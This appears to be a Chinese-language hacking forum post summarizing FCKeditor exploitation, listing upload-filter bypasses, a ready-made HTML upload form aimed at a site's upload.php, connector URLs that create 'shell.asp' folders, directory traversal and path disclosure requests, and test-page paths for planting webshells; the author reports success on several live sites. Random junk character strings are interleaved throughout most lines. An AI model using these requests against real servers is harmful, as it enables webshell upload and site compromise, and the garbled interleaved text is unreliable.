Fckeditor漏洞利用总结
2 z3 d2 M& g9 p& X8 T. Y; f; }查看编辑器版本
7 h1 Z: F7 W- A7 i3 [FCKeditor/_whatsnew.html
P- P( T) p: c2 L) |—————————————————————————————————————————————————————————————3 \ }4 _( }* K6 v' A
/ d" |& }: F, N, U/ U2 L, A( h2. Version 2.2 版本
8 P r; I0 d3 ~# BApache+linux 环境下在上传文件后面加个.突破!测试通过。
/ k$ Q3 c( L$ r% Q% g- O—————————————————————————————————————————————————————————————
: d3 D% Z8 q8 z) r% T; R- H# ~! F6 I3 E! S6 D2 Q
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
3 A1 N U, a6 y7 M" r# d0 [<form id="frmUpload" enctype="multipart/form-data"
; z3 j9 f" b8 W0 D; }1 Daction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
% Y- ], c# M, n& J4 e/ c0 s<input type="file" name="NewFile" size="50"><br>
$ [3 E6 }4 u8 M<input id="btnUpload" type="submit" value="Upload">
, C; R# Q3 I9 \( q8 j% l</form>4 ^- R# D% E& L8 W
—————————————————————————————————————————————————————————————' S& V7 o' R- @
3 i$ h: J0 @2 J; j# a6 B* w& L4.FCKeditor 文件上传“.”变“_”下划线的绕过方法; i7 L! a! k& N* o/ u
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。2 B6 M3 I& g3 o3 H- S5 U
4.1:提交shell.php+空格绕过
& W* j; V+ j7 ^0 N- T' F不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4 q( L% q8 P' J9 Z; f0 R' n 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。3 ]8 D( B' i8 C9 Z+ B
—————————————————————————————————————————————————————————————
- c3 @8 D$ F6 {6 f8 g4 P+ c7 y8 e* A0 T$ Q
5. 突破建立文件夹& B2 ]" `( o! C5 g2 e3 n4 K
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
* L8 W/ [4 q$ q, nFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3 w3 R9 i! C q—————————————————————————————————————————————————————————————
1 h2 w7 S4 |6 ]# C- R4 j D
# k1 I. o) \, Q$ q9 z6. FCKeditor 中test 文件的上传地址 z8 {* g3 d- R
FCKeditor/editor/filemanager/browser/default/connectors/test.html
2 h: q( r# {' _' U* R qFCKeditor/editor/filemanager/upload/test.html
; J% [% b4 Z! l4 y+ a1 v6 TFCKeditor/editor/filemanager/connectors/test.html* z/ }8 M* q# k7 G- B, k. ?
FCKeditor/editor/filemanager/connectors/uploadtest.html
, k- H9 d7 j) l- N1 l& M—————————————————————————————————————————————————————————————
' L& _8 ^7 V! a7 e# v* N4 @6 X" i6 F/ Z
& B6 G' O- `! S3 r0 ?, S7.常用上传地址
6 S( D8 o) u4 ~8 u9 G/ @6 iFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
& o; u2 I/ I# i9 lFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
9 o, e$ r. j/ ]" u' g4 i0 pFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
2 B8 ]! O. |* {6 t w3 a H9 {9 oJSP 版:1 _' W4 k- v6 B
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp Y8 X2 i" a3 B+ P( I+ M9 `# p
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
/ \+ K+ T. b% e件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
! V; Q+ e" E. ^—————————————————————————————————————————————————————————————
+ I; |4 B9 J! P" C6 X
3 X. m. D" y4 {8.其他上传地址" W1 @0 y, e( d! V! Q
FCKeditor/_samples/default.html9 \1 I' t/ T5 d( N7 `' Q
FCKeditor/_samples/asp/sample01.asp% F: f' F3 M X, i& M
FCKeditor/_samples/asp/sample02.asp) l" A, g0 L( \8 |; U
FCKeditor/_samples/asp/sample03.asp
) A# x6 G5 p$ OFCKeditor/_samples/asp/sample04.asp! P i. @% @( E* p
一般很多站点都已删除_samples 目录,可以试试。" ^: P' W) z; A$ x1 R
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
) Q1 [( _( O) `3 p5 J. @—————————————————————————————————————————————————————————————
, x8 z3 Z$ |, [2 d1 }7 C, r5 @% ^! I! S5 Y% u7 \! H8 m
9.列目录漏洞也可助找上传地址: ~7 x, c N4 o b- }
Version 2.4.1 测试通过
& `( ^; u& p& ]7 h修改CurrentFolder 参数使用 ../../来进入不同的目录
% D- x1 F& H* V# V# ]/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
6 L3 W4 W, l7 s6 ?- c$ h& z0 a2 r- R根据返回的XML 信息可以查看网站所有的目录。
; I) R+ P4 z" c' n# G/ n ?3 jFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F" E* |. P$ s( B* M
也可以直接浏览盘符:
8 o1 a4 g9 t% d% n2 y4 uJSP 版本:+ u. M) p) S. J4 \4 P
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
! x9 c6 q6 P* w- R2 ~5 k—————————————————————————————————————————————————————————————0 J, w* u. H. n! \# x" |6 S1 [
; z$ `* ], }2 c; f: E; i6 c j10.爆路径漏洞
% d# g' r6 A2 @& `3 Z4 lFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp2 t* Y9 }1 d( C4 j2 V8 K# W
—————————————————————————————————————————————————————————————
# M4 I3 p& r( S$ l0 H
9 D2 J7 l8 ~4 c! n! p* N4 ^* X! @2 ^11. FCKeditor 被动限制策略所导致的过滤不严问题
1 R' Y* F. O: C+ X4 e) o' S+ t 影响版本: FCKeditor x.x <= FCKeditor v2.4.32 q! n5 \! ?( P7 H) R' X3 ]+ ]
脆弱描述:
- J% n3 ?! G* n' x* E! kFCKeditor v2.4.3 中File 类别默认拒绝上传类型:( N9 c8 [. q) n# O
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm# a5 [6 _1 g7 N( C# S$ A. ?/ u
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!* p* W3 A& \9 X3 s
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
u8 N A `- v: x6 F2 K 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
M& e0 |" }6 d. s* W5 ~—————————————————————————————————————————————————————————————- ]! v( I3 k g3 B4 J8 z# j
- ]7 h, I, S3 w
12.最古老的漏洞,Type文件没有限制!
& d" A, B, z9 n2 e) M& y! x 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! 4 ?% X* b9 }( L
—————————————————————————————————————————————————————————————1 I- p3 d M8 I
# H5 ?0 u& D% {( X8 G/ v! e
===============================================================================================================================================
' ^( c) o/ P' |. [; c: P
& R3 T6 {$ M3 i' _0 `/ K, I7 xFCK编辑器jsp版本漏洞:/ h4 p. c1 Q3 |- I$ t
; k! j: i3 A) O7 l1 Y2 U
0 _0 o/ ~8 ?+ d* }0 b0 \
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F8 R$ h, Z" O2 F; R2 N) D2 {
6 n7 G) \6 W' D* h* _
上传马所在目录
- ^5 c; o* r( V! M# A4 W- zFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/& c: g7 z; n5 |% |
上传shell的地址: ?0 v: A+ `1 y% Z+ j
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector' L3 b$ Z9 L& r, L$ ^8 t
跟版本有关系.并不是百分百成功. 测试成功几个站.
* g+ W( @8 J1 f6 M6 p9 k不能通杀.很遗憾.
' A3 E- v, [# ]9 ~! `http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector6 T9 S8 u0 j2 c& `' z
如果以上地址不行可以试试: C4 h3 S7 x) s% X, n
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
- k$ D9 j$ T- T* PFCKeditor/_samples/
' Z" y) X. B/ D& u# O/ d+ MFCKeditor/_samples/default.html2 x# F- E: p! A4 ^5 U) Y
FCKeditor/editor/fckeditor.htm2 f, E) ^8 T0 d# A
FCKeditor/editor/fckdialog.html
) s/ h3 ?7 x& I. G
8 R( L( ?* w; C8 m" n1 F8 W# y
, R: t) \- {: D7 `5 {2 a6 Z5 o5 j" p' K# H; U+ z& \
解析漏洞+未重命名文件时上传漏洞 1.asp;jpg- v2 A( S, l9 N3 p( j
|